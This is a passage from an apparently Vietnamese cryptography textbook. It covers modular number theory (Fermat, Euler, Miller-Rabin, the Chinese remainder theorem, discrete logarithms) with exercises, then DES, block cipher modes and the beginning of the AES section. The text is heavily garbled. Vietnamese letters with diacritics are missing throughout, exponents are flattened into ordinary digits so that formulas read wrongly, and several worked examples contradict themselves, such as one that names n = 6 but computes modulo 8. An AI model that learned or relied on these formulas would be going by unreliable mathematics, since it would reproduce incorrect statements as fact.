    V d: 91=713; 3600=243252 Thng thng tm phn tch trn, ta phi kim tra tnh chia ht cho cc s nguyn t t nh n ln v thc hin php chia lin tip cho cc s nguyn t, ri gp thnh ly tha ca cc s nguyn t. III.4.3 Cc s nguyn t cng nhau v GCD Hai s nguyn dng a v b khng c c chung no ngoi 1, c gi l nguyn t cng nhau. V d: 8 v 15 l nguyn t cng nhau, v c ca 8 l 1, 2, 4, 8, cn c ca 15 l 1, 3, 5, 15. Ch c 1 l c chung ca 8 v 15.

    - 37 Ngc li c th xc nh c chung ln nht bng cch trong cc phn tch ra tha s ca chng, tm cc tha s nguyn t chung v ly bc ly tha nh nht trong hai phn tch ca hai s . V d. Ta c phn tch: 300=213152 v 18=2132. Vy GCD(18,300)=213150=6 III.4.4 nh l Ferma (nh l Ferma nh) ap-1 mod p = 1 trong p l s nguyn t v a l s nguyn bt k khc bi ca p: GCD(a, p) = 1. Hay vi mi s nguyn t p v s nguyn a khng l bi ca p, ta lun c ap = a mod p Cng thc trn lun ng, nu p l s nguyn t, cn a l s nguyn dng nh hn p. V d. V 5 v 7 l cc s nguyn t. 2 v 3 khng l bi tng ng ca 7 v 5, nn theo nh l Ferma ta c 27-1 mod 7 = 1 (= 26 mod 7 = 64 mod 7= 1) 35-1 mod 5 = 1 (= 34 mod 5 = 81 mod 5= 1) (-2)11-1 mod 11 = 1 (= 210 mod 11 = 1024 mod11 = 1) Kt qu trn c dng trong kho cng khai. N cng c s dng kim tra tnh nguyn t ca mt s nguyn p no , bng cch ly ngu nhin cc s a v kim tra xem c tnh cht nu trn khng, kt lun l p nguyn t cng thuyt phc nu php th trn ng vi nhiu ln chn ngu nhin cc s a. III.4.5 Hm Ole Cho n l mt s nguyn dng. Khi thc hin php tnh ng d n ca mi s nguyn khc ta nhn c tp y cc phn d c th c l: 0, 1, 2,, n-1 T tp trn ta tm tp rt gn bao gm cc s nguyn t cng nhau vi n v quan tm n s lng cc phn t nh vy i vi s nguyn dng n cho trc. V d. Vi n = 10: o Tp y cc phn d l {0,1,2,3,4,5,6,7,8,9} o Tp rt gn cc phn d nguyn t vi 10 l {1,3,7,9} o S cc phn t ca tp rt gn trn l gi tr ca hm Ole (n). Nh vy, (10) = 4. Mun tnh (n) vic m s cc s ngyn t cng nhau vi n v nh hn n c loi b v y l bi ton tn nhiu cng sc. Ni chung c th tnh hm le ca mt s da trn biu thc phn tch ra tha s ca s . o D dng thy, nu p l s nguyn t (p) = p-1 o Nu p v q l hai s nguyn t khc nhau, th c th chng minh c rng: o (p.q) = (p-1)(q-1) o Nu p l s nguyn t, th (pn) = pn-pn-1

    - 38 -

    o Nu s v t l hai s nguyn t cng nhau, th


    (s).(t) Vi d.

    (s.t) =

    (37) = 37 1 = 36 (21) = (31)(71) = 26 = 12 (72) = (8.9) = (8). (9) = (23).(32) = = (23-22)(32-31) = 4.6 = 24 III.4.6 nh l Ole nh l Ole l tng qut ho ca nh l Ferma a(n)mod n = 1 vi mi cp s nguyn dng nguyn t cng nhau a v n: gcd(a,n)=1. V d. a = 3; n = 10; (10)=4; V vy 34 = 81 = 1 mod 10 a = 2; n =11; (11)=10; Do 210 = 1024 = 1 mod 11 III.4.7 Kim tra tnh nguyn t Gi s cn phi tm mt s nguyn t rt ln. Ly ngu nhin mt s ln, ta cn phi kim tra xem s c phi l s nguyn t khng. Phng php truyn thng l th bng php chia nh sau: o Chia cho tt c cc s (ch cn nguyn t) nh hn hoc bng cn bc hai ca s . Nu n khng chia ht cho s no, th l s nguyn t. o Ch hiu qu khi xt cc s nh. C phng php khc, m ta s xt y, s dng cc php kim tra tnh nguyn t thng k da trn cc tnh cht o M mi s nguyn t phi tha mn o Nhng c mt s s khng nguyn t, gi l gi nguyn t cng tho mn tnh cht . C th l php kim tra da trn nh l Ferma nh sau: nu s n cn kim tra tnh nguyn t l s nguyn t, th n s tho mn nh l Ferma i vi mi s a nh hn n an-1 mod n = 1. Nh vy, ly ngu nhin s a v kim tra xem n c tnh cht trn khng. Nu c th n c th l s nguyn t, nu cn tin cy ln hn, th ta kim tra lin tip nhiu ln nh vy vi cc s ngu nhin a c chn. Sau mi ln qua c php th, xc sut n l s nguyn t li tng ln. Ch rng - nu bi mod n = 1, th b2i mod n = (1)2 mod n = 1 v - nu bi mod n = n 1, th b2i mod n = (n - 1)2 mod n = (n2 2n +1) mod n = 1 Kim tra s n c l s nguyn t khng, ta ch cn xt n l l, khi n-1 l chn v biu din n dng (n1)= 2k.q Khi tnh an-1, ta tnh aq, sau bnh phng lin tip k ln.

    - 39 Thut ton Miller - Rabin Thut ton nh sau: TEST (n) is: 1. Find integers k, q, k > 0, q odd, so that (n1)= 2k.q 2. Select a random integer a, 1<a<n1 3. if aq mod n = 1 then return (maybe prime"); 4. for j = 0 to k 1 do 5. if (a2jq mod n = n-1) then return(" maybe prime ") 1. return ("composite") Cc xem xt v mt xc sut Nu thut ton Miller Rabin tr v s composite th s chc chn khng l s nguyn t, v khi s n v s a < n khng tho mn nh l Fecma, tc l an-1 mod n 1. Ngc li s c th l s nguyn t hoc gi nguyn t theo ngha n tho mn nh l Fecma vi s a < n. Ngi ta chng minh c rng xc sut s gi nguyn t khng l s nguyn t l l . Suy ra nu lp t php th vi cc la chn ngu nhin khc nhau ca s a, th khi xc sut s n sau t php th l s nguyn t l: 1-(1/4)t V d. Sau 10 bc, t = 10, m s cho n u c th l nguyn t, th xc sut n l s nguyn t l 1 (1/4)10 > 0.99999. Phn b nguyn t. nh l v s nguyn t khng nh s nguyn t xut hin trung bnh sau mi khong ln n s nguyn (nu xt cc s trong kch thc n). Nh vy b qua s chn v cc bi s ca 5, ta cn kim tra 0.4ln n s trong kch thc n tm c 1 s nguyn t. Chng hn n=1024, th 0.4*ln 1024 = 0.4*10 = 4, ngha l trong 1024 s u, th trung bnh c 4 s li c mt s nguyn t. Lu y ch l trung bnh, v c lc cc s nguyn rt gn nhau v c lc li rt xa nhau. III.4.8 nh l phn d Trung Hoa Trong nhiu trng hp ta mun tm cch tng tc tnh ton Modulo. Cc php ton trn modulo cc s nh tnh nhanh nhiu so vi cc s ln. Chnh v vy nu s ln phn tch c thnh tch ca cc s nh, tng cp nguyn t cng nhau, th ta s c cch tnh hiu qu nh vo nh l Phn d Trung hoa. Tnh ton trn modulo ca mt tch cc s mod M vi M= m1m2..mk, trong GCD(mi, mj) = 1, vi mi i khc j. nh l phn d Trung Hoa cho php lm vic trn tng modulo mi ring bit. V thi gian tnh ton cc php ton trn modulo t l vi kch thc ca s ly modulo nn iu s nhanh hn tnh ton trn ton b M. C th trin khai nh l Trung Hoa theo mt s cch nh sau: Tnh ton theo modulo s ln. tnh A mod M, vi M kh ln v A l biu thc s hc no . Trc ht ta cn tnh tt c ai = A mod mi. Sau s dng cng thc

    - 40 -

    trong

    Mi = M/mi

    V d. Tnh 178 mod 77. p dng nh l phn d Trung hoa, ta coi A = 1718, m1 = 7, m2 = 11. Khi M1 = 11, M2 = 7 v 11-1 mod 7 = 4-1 mod 7 = 2, suy ra c1 = 11*2 = 22 7-1 mod 11 = 8, suy ra c2 = 7*8 = 56 a1 = 178 mod 7 = (17 mod 7)8 mod 7 = 38 mod 7 = (32)4 mod 7 = 2 a2 = 178 mod 11 = (17 mod 11)8 mod 11 = 68 mod 11 = = (62)4 mod 11 = 34 mod 11 = 4 Vy A = 178 mod 77 = (2*22 + 4*56) mod 77 = 268 mod 77 = 37 mod 37 Gii h phng trnh modulo. Cho ai = x mod mi, vi GCD(mi, mj) = 1, vi mi i khc j. Khi ta cng p dng nh l phn d Trung Hoa tm x. V d. Cho x 5 mod 7 v x 6 mod 11. Tm x. p dng nh l phn d Trung hoa, ta tnh: 7-1 mod 11 = 8 v 11-1 mod 7 = 2. Nh vy x = (5*2*11 + 6*8*7) mod (7*11) = 61 mod 77.

    III.4.9 Cn nguyn t T nh l Ole ta c a(n)mod n=1, vi a v n l nguyn t cng nhau. Nu khng c s m dng no nh hn (n), m c tnh cht nh vy i vi a, th khi ta gi a l cn nguyn t ca n. C th nh sau: Xt m am mod n = 1, GCD(a,n)=1 Theo nh l le ta c m = (n) tha mn h thc trn, nhng c th cng c gi tr nh hn ca m < (n) cng tho mn. Khi t c m nh vy, th n cng tho mn vi bi ca m, tc l s c vng lp. Nu gi tr m = (n) l s dng nh nht tho mn cng thc trn th a c gi l cn nguyn t ca n. Nu p l s nguyn t v a l cn nguyn t ca p, th cc lu tha ca a: a0, a1, , ap-2 s sinh ra nhm modulo p. Vic tm cc cn nguyn t a ca n s c ch trong vic xt m cng khai. V d. Xt s nguyn t p = 5 v xt xem a = 2 c phi l cn nguyn t ca 5 khng? Ta c: 2 mod 5 = 2; 22mod 5 = 4; 23mod 5 = 3; 24mod 5 = 1 R rng m= 4= (5) l s m dng nh nht c tnh cht 2m mod 5 = 1, nn 2 l cn nguyn t ca 5. Xt s n = 6 v xt xem a = 3 c phi l cn nguyn t ca 3 khng? Ta c 3 mod 8 = 3; 32mod 8 = 1; 33mod 8 = 3; 34mod 8 = 1 R rng m= 2 < 4 = (8) l s m dng nh nht c tnh cht 3m mod 8 = 1, nn 3 khng l cn nguyn t ca 8.

    - 41 III.4.10 Logarit ri rc Bi ton ngc ca bi ton ly tha l tm logarit ri rc ca mt s modulo p, tc l tm s nguyn x sao cho ax = b mod p Hay cn c vit l x=logab mod p hoc x=inda,p(b) Nu a l cn nguyn t ca p v p l s nguyn t, th lun lun tn ti logarit ri rc, ngc li th c th khng V d. Tm x = log2 3 mod 13. Bng cch th ln lt: 20 mod 13 = 1; 21 mod 13 = 2, 22 mod 13 = 4, 23 mod 13 = 8, 24 mod 13 = 3. Vy log2 3 mod 13 = 4. x Tm x = log3 4 mod 13 (tm x: 3 = 4 mod 13). Trong trng hp ny khng c li gii, v 30 mod 13 = 1; 31 mod 13 = 3; 32 mod 13 = 9; 33 mod 13 = 1= 30 mod 13 Ta nhn thy, trong khi bi ton ly tha l d dng, th bi ton logarit ri rc l rt kh. y cng l mt c s ca m cng khai. Bi tp. 1. Chng t rng tp cc s nguyn vi php cng hai s nguyn to thnh nhm giao hon.Chng t rng tp cc s nguyn vi php cng hai s nguyn v php nhn hai s nguyn to thnh vnh giao hon. nhm giao hon. Hi vnh c to thnh min nguyn hay trng khng. 2. Chng t rng tp cc phn d khi chia cho n, Zn vi hai php ton v nhn theo modulo n to thnh vnh giao hon. Vi n tha mn iu kin g, th vnh l trng. 3. Tnh gi tr cc biu thc theo modulo sau: 8 mod 9 + 7 mod 9 8 mod 9 * 7 mod 9 5 mod 11 9 mod 11 53 mod 7 520 mod 7 5/6 mod 7 4. Tnh gi tr cc biu thc theo modulo sau (-546) mod 13 - 347 mod 11 (1234 + 2345) mod 17 (213 * 345) mod 19 15-1 mod 101 41-1 mod 100 1435 mod 11 (235*126/13) mod 19 31130 mod 23 (23525 /17 + 12619. 397 /13) mod 29 5. Ci t thut ton Ocolit m rng

    - 42 6. Biu din php nhn a thc vi h s theo mod 2 v theo module a thc sau (x3 + x + 1) (gi l GL(23): (x + 1) * (x2 + x + 1) mod (x3 + x + 1) x2 * (x2 + x + 1) mod (x3 + x + 1) (x2 + 1) * (x2 + x + 1) mod (x3 + x + 1) (x2 + x + 1) * (x2 + x + 1) mod (x3 + x + 1) di dng cc php ton shift v XOR ca bit 7. Chng t GL(23) l mt trng, nu thut ton tm cc phn t nghch o theo php nhn ca cc phn t khc 0. 8. Tnh hm le ca cc s nguyn sau: 12, 17, 21, 32, 36, 40, 72, 256. 8 Dng nh l Ferma v nh l Ole tnh cc biu thc sau 616 mod 17; 1516 mod 17; 95100 mod 101 74 mod 10; 95 mod 10; 1012 mod 21; 9190 mod 100; 9 Ci t chng trnh kim tra s gi nguyn t 10 Gii cc phng trnh modulo sau x mod 11 = 3; x mod 13 = 6 y mod 51 = 11; y mod 100 = 15 z mod 12 = 5; z mod 17 = 8; z mod 23 = 11. 11 S dng nh l phn d Trung Hoa tnh gi tr cc biu thc sau 2530 mod (7*8) 70254 mod (11*13) 60-1 mod (11*13) ((21100 + 33-1). 4551) mod (7.9.11) ((19125 + 2551)4721 /37 mod (9.11.13) 12 Tm cc cn nguyn t ca 9, 11 13 Tm cc cn nguyn t ca 13 v 17. 14 Tnh logarit ri rc sau, nu c: Log3 7 mod 11, Log2 9 mod 11 Log5 6 mod 13, Log3 7 mod 13 Log2 15 mod 17, Log3 11 mod 17

    - 43 CHNG IV: CHUN M D LIU (DES) V CHUN M NNG CAO (AES) IV.1 M khi hin i By gi chng ta xt cc m khi hin i. y l kiu m c s dng rng ri nht ca cc thut ton m ho. ng thi n cng c s dng kt hp vi cc th tc khc nhm cung cp cc dch v an ton v xc thc. Trc ht chng ta tp trung vo chun m d liu DES (Data Encryption Standards) minh ho cho cc nguyn l m khi. Trc ht chng ta xt hai kiu x l thng tin khc nhau trn bn r. Mt kiu chia d liu thnh tng khi x l, kiu kia x l trc tip tng n v thng tin. IV.1.1 Phn bit m khi vi m dng. o M khi (block) x l bn tin theo tng khi, ln lt mi khi c m hoc gii m. C th xem ging nh php th vi cc k t ln mi khi gm 64 bt hoc nhiu hn. o M dng x l bn tin theo tng bt hoc bite, ln lt mi bt hoc bite c m ho hoc gii m. Chng hn nh m kho t ng Vigenere. o Rt nhiu m hin nay l m khi. Chng c kh nng ng dng rng ri hn. Rt nhiu ng dng m i xng trn mng s dng m khi. Cc nguyn l m khi o Hu ht cc m khi i xng da trn cu trc m Fiestel, do nh bac hc Fiestel xut nm 1973. y l iu cn thit, v cn phi c kh nng gii m cc bn m mt cch c hiu qu. o M khi c coi ging nh php th cc ln. Cn bng c 264 u vo cho m khi 64 bt, bng nh vy l rt ln. Do c th thay th bng cch to cc khi nh hn. o S dng tng dng m tch. y s kt hp gia m thay th v m hon v, ng thi s dng nhiu vng lp nh vy. IV.1.2 Claude Shannon v m php th hon v Nm 1949, Shannon a ra tng mng php th v hon v (S-P networks) l m tch php th v hon v hin i vi mc ch l cn tr vic thm m da vo cc phn tch thng k. Gi s k thm m bit mt s tnh cht thng k ca bn r nh bng phn b tn sut ca cc ch ci, b cc ch ci. Nu cc c trng thng k ny c phn nh trong bn m, th k thm m s tm cch tm c kho hoc mt phn kho hoc tm m ra bn r. Shannon mun c mt bn m l tng, mi c trng thng k u c lp vi kho ring c dng, nh vy k thm m s khng c c s tm kho. Mng S-P to nn c s cho m khi hin i. Mng S-P da trn hai thao tc m c bn m ta bit: php th (S-box) v hon v (P-box). Chng s to nn ri lon v khuch tn ca bn tin. Ri lon v khuch tn o Mt tnh cht quan trng ca m tt l m cn phi che du hon ton cc tnh cht thng k ca bn tin gc. Nh ta thy m b m mt ln c th lm c iu , do tnh ngu nhin ca kho m v di bng bn tin ca n. o Shannon nghin cu v xut phng php thc t hn l kt hp cc thnh phn khc nhau ca bn r x l qua nhiu ln v nhn c bn m.

    - 44 o Khuch tn l lm tan bin cu trc thng k ca bn r trn bn m. iu t c nu mi bit ca bn r tc ng n gi tr ca rt nhiu bit trn bn m hay mi bit ca bn m chu tc ng ca nhiu bit bn r. o Ri lon l lm cho quan h gia bn m v kho cng phc tp cng tt. Bn m c tnh ri lon cao s lm cho vic tm m kho tr nn rt kh khn, ngay c khi k tn cng c cc c trng thng k ca bn m v bit cch kho tc ng n bn m. IV.1.3 Cu trc m Fiestel Horst Fiestel sng to nn m Fiestel da trn m tch nghch o c, tc l kt hp m th vi m hon v v qui trnh gii m l ging vi m ho, ch cn thay i vai tr khi bn m vi khi bn r v th t cc kho con c dng. T kho chnh sinh ra cho mi vng lp mt kho con. Chia khi u vo thnh 2 na bng nhau: o Thc hin php th trn na tri. S dng hm vng trn na phi v kho con, ri tc ng n na tri. o Sau hon v cc na, na phi cha c x l. o X l vng tip theo. y l mt th hin ca m th kt hp vi hon v ca Shannon. Ta xem xt c th cu trc m Fiestel gm n vng:

    - 45 Nguyn tc thit k m khi Fiestel Tng kch thc khi s lm tng an ton nhng lm gim tc m Tng kch thc kho s lm tng an ton tm kho kh hn, nhng lm chm m. Tng s vng lm tng an ton nhng lm chm m Pht sinh kho con cng phc tp lm cho vic thm m kh hn nhng lm chm m Hm vng cng phc tp lm cho vic thm m kh hn nhng lm chm m Phn mm m ho/gii m nhanh v kh thm m l tiu ch hay c cp n i vi ng dng v kim nghim thc t. Gii m khi Fiestel

    IV.2 Chun m d liu (DES) DES (Data Encryption Standards) l m khi s dng rng ri nht trn th gii trong thi gian va qua. N c a ra nm 1977 bi NBS vn phng chun Quc gia Hoa k (by gi l NIST - Vin chun v cng ngh Quc gia). DES l m khi vi mi khi d liu 64 bt v dng kho di 56 bt. N c s dng rng ri v c tranh lun k v mt an ton.

    - 46 IV.2.1 Lch s DES: Cui nhng nm 1960, IBM pht trin m Lucifer, c lnh o bi Fiestel. Ban u Lucifer s dng khi d liu 64 bt v kho 128 bt. Sau tip tc pht trin nh m thng mi. Nm 1973 NBS yu cu xut chun m Quc gia. IBM ngh bn sa i Lucifer, sau ny gi l DES. c cc tranh lun v thit k ca DES. V chun ca DES c cng khai, mi ngi ng gp kin v tc , di kho v mc an ton, kh nng thm m. Ngi ta xut chn kho 56 bt thay v 128 tng tc x l v a ra cc tiu chun thit k mt chun m d liu. Cc suy lun v phn tch chng t rng thit k nh vy l ph hp. Do DES c s dng rng ri, c bit trong lnh vc ti chnh. IV.2.2 S m DES

    Hon v ban u IP: y l bc u tin ca tnh ton d liu, hon v IP o th t cc bt u vo: cc bt chn sang na tri v cc bt l sang na phi. Hon v trn d dng thc hin trn phn cng. Mi s trong h 16 biu din bi 4 bit, 16 s c th hin bi 64 bit. Mi bit c mt v tr xc nh qua hon v ban u (xem bng ph lc cui ti liu). V d IP(675a6967 5e5a6b5a) = (ffb2194d 004df6fb) Cu to mt vng ca DES S dng hai na 32 bt tri v 32 bt phi. Nh i vi mi m Fiestel, na phi ca vng trc c chuyn qua na tri ca bc sau v ly u ra ca hm vng trn na phi v kho con cng c s 2 vi na tri. C th biu din bng cng thc nh sau:

    - 47 Li = Ri1 Ri = Li1 xor F(Ri1, Ki) y F ly 32 bt na phi R, m rng thnh 48 bt nh hon v E, ri cng vo vi kho con 48 bt. Sau chia thnh 8 cm 6 bt v cho qua 8 S-box nhn c kt qu 32 bt. o ln cui s dng hon v 32 bt P nhn c 32 bt u ra, ri cng vi na tri chuyn thnh na phi ca bc sau.

    Cc hp th S (xem ph lc cui ti liu) C 8 hp S khc nhau nh x 6 bt vo 4 bt. Cc hp S box thc hin cc php th, chng c cu to khng c qui lut v c nh. Mi S box l hp 4 x 16 bt, mi hng l mt hon v ca 16 phn t. Gi s ta c 6 bt u vo. Ta ly hai bt ngoi 1-6 ghp li c s nh phn xc nh chn hng t 0 n 3 trong S box. Bn bt t 2 n 5 l mt s nh phn xc nh ct t 0 n 15 trong S box. Ly phn t tng ng trn hng v ct mi c xc nh, y l mt s t 0 n 15, chuyn sang s nh phn ta c 4 bt u ra. Nh vy 48 bt chia thnh c 8 cm 6 bt, qua 8 S box c chuyn thnh 8 cm 4 bt, tng cng l 32 bt Vic chn hng trong cc S box ph thuc c d liu v kho - c trng ny c gi l kho t xc nh V d: S(18 09 12 3d 11 17 38 39) = 5fd25e03 Sinh kho con ca DES o To 16 kho con s dng cho 16 vng ca DES. 56 bit kho u vo c s dng nh bng 8 x 8, trong ct th 8 khng s dng. o Hon v ban u ca kho PC1 v tch 56 bt thnh hai na 28 bt. o 16 giai on bao gm mi vng na tri v na phi c dch tri vng quanh tng ng 1 v 2 bit. Hai na ny c dng tip cho vng sau. ng thi hai na cng cho qua hon v PC2 v chn mi na 24 bt gp li thnh 48 bt sinh kho con.. o ng dng thc t trn c phn cng v phn mm u hiu qu

    - 48 -

    Cc thng s c th v hon v ban u, cc hp Box v thut ton sinh kho ca DES c cho cui ti liu trong phn ph lc. Gii m DES Gii m lm ngc li qu trnh m ho. Vi thit k Fiestel thc hin m ho tip vi cc kho con t SK16 ngc li v SK1. Nhn thy rng hon v ban u IP s tr li tc dng ca hon v cui FP. Vng u vi SK16 s tr li tc dng ca vng m th 16. Vng th 16 vi SK1 s tr li tc dng ca vng m u tin. Hon v cui FP tr li tc dng hon v ban u IP. Nh vy khi phc li c d liu ban u. IV.2.3 Tnh cht ca DES Tc dng ng lot. Khi ta thay i 1 bit trong kho s gy ra tc ng ng lot lm thay i nhiu bit trn bn m. y l tnh cht mong mun ca kho trong thut ton m ho. Nu thay i 1 bt u vo hoc kho s ko theo thay i mt na s bt u ra. Do khng th on kho c. Co th ni rng DES th hin tc ng ng lot mnh. Sc mnh ca DES kch thc kho. di ca kho trong DES l 56 bt c 256 = 7.2 x 1016 gi tr khc nhau. y l con s rt ln nn tm kim duyt rt kh khn. Cc thnh tu gn y ch ra rng thi gian cn thit gii mt trang m DES m khng bit kho l: sau mt vi thng trn Internet trong nm 1997; mt vi ngy trn thit b phn cng tng cng trong nm 1998; sau 22 gi nu kt hp cc bin php trong nm 1999. Nh vy vn c th on c bn r sau mt khong thi nht nh, nu c ngun lc my tnh mnh. Chnh v vy by gi ngi ta xt mt vi bin th ca DES nhm nng cao sc mnh cho DES. Sc mnh ca DES tn cng thi gian. y l dng tn cng vo ci t thc t ca m. y s dng hiu bit v qu trnh ci t thut ton m suy ra thng tin v mt s kho con hoc mi kho con. c bit s dng kt lun l cc tnh ton chim khong thi gian khc nhau

    - 49 ph thuc vo gi tr u vo ca n. Do k thm m theo di thi gian thc hin m phn on v kho. C th k thm m sng to ra cc loi card thng minh phn on kho, m cn phi bn bc thm v chng. Sc mnh ca DES tn cng thm m. C mt s phn tch thm m trn DES, t xut xy dng mt s cu trc su v m DES. Ri bng cch thu thp thng tin v m, c th on bit c tt c hoc mt s kho con ang dng. Nu cn thit s tm duyt nhng kho cn li. Ni chung, l nhng tn cng da trn phng php thng k bao gm: thm m sai phn, thm m tuyn tnh v tn cng kho lin kt. Thm m sai phn Mt trong nhng thnh tu cng khai gn y trong thm m l phng php thm m sai phn. N c bit n bi NSA trong nhng nm 70, chng hn trong thit k DES. Murphy, Birham v Shamir cng b phng php sai phn nm 1990. y l phng php mnh phn tch m khi. N s dng phn tch hu ht cc m khi hin ti vi mc thnh cng khc nhau. Nhng DES c th khng c li cc tn cng . Thm m sai phn l tn cng thng k chng li cc m Fiestel. M Fiestel dng cc cu trc m cha c s dng trc kia nh thit k S-P mng c u ra t hm f chu tc ng bi c u vo v kho. Do khng th tm li c gi tr bn r m khng bit kho. Thm m sai phn so snh hai cp m c lin quan vi nhau o Vi s khc bit bit u vo o Kho st s khc bit u ra o Khi vi cng kho con c dng o Trong cng thc sau vi hai u vo khc nhau, v tri l s khc bit m cng vng th i c biu din qua s khc bit m vng trc i-1 v s khc bit ca hm f trong ngoc vung.

    S khc bit u vo cho s khc bit u ra vi mt xc sut cho trc. o Nu tm c mt th hin u vo - u ra vi xc sut cao. Th c th lun ra kho con c s dng trong vng o Sau c th lp li cho nhiu vng (vi xc sut gim dn) Cp ng cho bt kho nh nhau Cp sai cho gi tr ngu nhin o i vi s vng ln, xc sut c nhiu cp u vo 64 bt tho mn yu cu l rt nh. o Birham v Shamir ch ra rng lm nh th no cc c trng lp ca 13 vng c th b c DES 16 vng y .

    - 50 -

    o Qui trnh thm m nh sau: thc hin m ho lp li vi cp bn r c XOR u vo bit trc cho n khi nhn c XOR u ra mong mun o Khi c th tm c nu vng trung gian tha mn XOR yu cu th c cp ng nu khng th c cp sai, t l sai tng i cho tn cng bit trc da vo thng k. o Sau c th to ra cc kho cho cc vng theo suy lun sau Thm m tuyn tnh y l mt pht hin mi khc. N cng dng phng php thng k. y cn lp qua cc vng vi xc sut gim, n c pht trin bi Matsui v mt s ngi khc vo u nhng nm 90. C s ca phng php da trn tm xp x tuyn tnh. V c nhn nh rng c th tn cng DES vi 247 bn r bit. Nh vy thm m tuyn tnh vn khng kh thi trong thc t. o Tm xp x tuyn tnh vi xc sut p != P[i1,i2,...,ia] (+) C[j1,j2,...,jb] = K[k1,k2,...,kc] trong ia, jb, kc l cc v tr bit trong bn r, m, kho. o iu kin trn cho phng trnh tuyn tnh ca cc bt kho. nhn c 1 bt kho s dng thut ton ln cn tuyn tnh

    - 51 o S dng mt s ln cc phng trnh th nghim. Hiu qu cho bi |p 1/2| Trong qu trnh tm hiu DES ngi ta h thng li cc tiu chun thit k DES. Nh bo co bi Copperscmith trong [COPP94]: o C 7 tiu chun i vi S box c cung cp m bo tnh phi tuyn tnh chng tham m sai phn Ri lon tt o C 3 tiu chun cho hon v P tng khuch tn Cc nguyn l m khi Cc nguyn l c bn ca m khi ging nh Fiestel xut trong nhng nm 70: o C mt s vng: cng nhiu cng tt; tn cng tt nht phi tm tng th o Trong mi vng c hm cung cp ri lon l phi tuyn, tc ng ng lot o Qui trnh sinh kho con phc tp, kho tc ng ng lot n bn m. IV.2.4 Cc kiu thao tc ca DES M khi m cc block c kch thc c nh. Chng hn DES m cc block 64 bt vi kho 56 bt Cn phi c cch p dng vo thc t v cc thng tin cn m c kch thc ty . Trwosc kia c 4 kiu thao tc c nh ngha cho DES theo chun ANSI: ANSI X3.106-1983 Modes of Use. By gi m rng them c 5 cch cho DES v chun m nng cao (AES Advanced Encryption Standards). Trong c kiu p dng cho khi v c kiu p dng cho m dng. 1. Sch mt m in t (Electronic Codebook Book - ECB) o Mu tin c chia thnh cc khi c lp, sau m tng khi o Mi khi l gi tr cn thay th nh dng sch m, do c tn nh vy o Mi khi c m c lp vi cc m khc Ci = DESK1 (Pi) o Khi dng: truyn an ton tng gi tr ring l

    - 52 o u v nhc ca ECB Lp trn bn m c ch r lp trn bn tin - Nu dng ng khi - c bit vi hnh nh - Hoc vi bn tin m thay i rt t s tr thnh i tng thm m Nhc im l cc khi c m c lp c s dng ch yu khi gi mt t d liu 2. Dy chuyn m khi (Cipher Block Chaining - CBC) o Cc mu tin c chia thnh cc khi o Nhng chng c lin kt vi nhau trong qu trnh m ho o Cc block c sp thnh dy, v vy c tn nh vy o S dng vct ban u IV bt u qu trnh Ci = DESK1(Pi XOR Ci-1) C-1 = IV o Dng khi: m d liu ln, xc thc

    o u v nhc ca CBC Mi khi m ph thuc vo tt c cc khi bn r S thay i ca bn tin u s ko theo s thay i ca mi khi m Cn gi tr vc t ban u IV c bit trc bi ngi gi v ngi nhn - Tuy nhin nu IV c gi cng khai, k tn cng c th thay i bt u tin v thay i c IV b tr - Vy IV cn phi c gi tr c nh trc hoc m ho trong ch ECB v gi trc phn cn li ca mu tin cui bn tin, kim sot cc block ngn cn li - C th b sung cc gi tr khng phi d liu nh NULL

    - 53 - Hoc dng b m cui vi s byte m kch thc ca n. V d [ b1 b2 b3 0 0 0 0 5] <- 3 data bytes, vy c 5 bytes dnh cho m v m. 3. M phn hi ngc (Cipher FeedBack - CFB) o Bn tin coi nh dng cc bt o B sung vo u ra ca m khi o Kt qu phn hi tr li cho giai on tip theo, v vy c tn nh vy. o Ni chung cho php s bt phn hi l 1, 8, 64, hoc tu : k hiu tng ng l CFB1, CFB8, CFB64, o Thng hiu qu s dng c 64 bt Ci = Pi XOR DESK1(Ci-1) C-1 = IV o c dng cho m d liu dng, xc thc

    u v nhc im ca m phn hi ngc o c dng khi d liu n theo byte/bit o Ch dng thng gp nht o Hn ch l cn ngn chung khi m khi sau mi n bit o Nhn xt l m khi c dng ch m c hai u o Li s lan ra mt vi block sau li 4. Phn hi ngc u ra (Output FeedBack - OFB) o Mu tin xem nh dng bit o u ra ca m c b sung cho mu tin o u ra do l phn hi, do c tn nh vy o Phn hi ngc l c lp i vi bn tin o C th c tnh trc Ci = Pi XOR Oi Oi = DESK1(Oi-1)

    - 54 O-1 = IV o c dng cho m dng trn cc knh m thanh

    u im v nhc im ca OFB o c dng khi li phn hi ngc li hoc ni cn m trc khi mu tin sn sng o Rt ging CFB o Nhng phn hi l t u ra ca m v c lp vi mu tin o L bin th ca m Vernam, suy ra khng s dng li vi cng mt dy (Key + IV) o Ngi gi v ngi nhn phi ng b, c phng php khi phc no l cn thit m bo vic . o Nguyn bn ch r m bit phn hi ngc theo cc chun o Cc nghin cu tip theo ch ra rng ch c OFB64 l dng c 5. B m CTR (Counter) o L ch mi, tuy c xut t lu o Ging nh OFB, nhng m gi tr m thay v gi tr phn hi tu . o Cn phi c kho khc v gi tr m cho mi khi bn r (khng bao gi dng li) Ci = Pi XOR Oi Oi = DESK1(i) o c dng m trn mng vi tc cao o u v nhc im ca CTR Hiu qu - Do c th m song song - Chun b trc nu cn - Tt cho cc kt ni vi tc rt cao Truy cp ngu nhin n cc khi d liu m Tnh an ton c th chng minh c

    - 55 Nhng phi tin tng khng bao gi dng li kho/m, nu khng c th b.

    IV.3 Chun m nng cao (AES) IV.3.1 Ngun gc R rng cn phi thay th DES, v c nhng tn cng v mt l thuyt c th b c n. Mt s tn cng nghin cu thu o kho c trnh din. Ngi ta thy rng, cn s dng Triple DES (s dng DES ba ln lin tip) cho cc ng dng i hi tng cng bo mt, nhng qu trnh m v gii m chm, ng thi vi khi d liu nh. Do Vin chun quc gia Hoa k US NIST ra li ku gi tm kim chun m mi vo nm 1997. Sau c 15 c c chp nhn vo thng 6 nm 1998. V c rt gn cn 5 ng c vin vo thng 6 nm 1999. n thng 10 nm 2000, m Rijndael c chn lm chun m nng cao v c xut bn l chun FIPS PUB 197 vo 11/2001. Yu cu ca AES L m khi i xng kho ring. Kch thc khi d liu 128 bit v di kho l ty bin: 128, 192 hoc 256 bit. Chun m mi phi mnh v nhanh hn Triple DES. M mi c c s ls thuyt mnh thi gian sng ca chun khong 20-30 nm (cng thm thi gian lu tr). Khi a ra thnh chun yu cu cung cp chi tit thit k v c t y . m bo rng chun m mi ci t hiu qu trn c C v Java. NIST in rt gn mi xut, phn tch v khng phn loi. 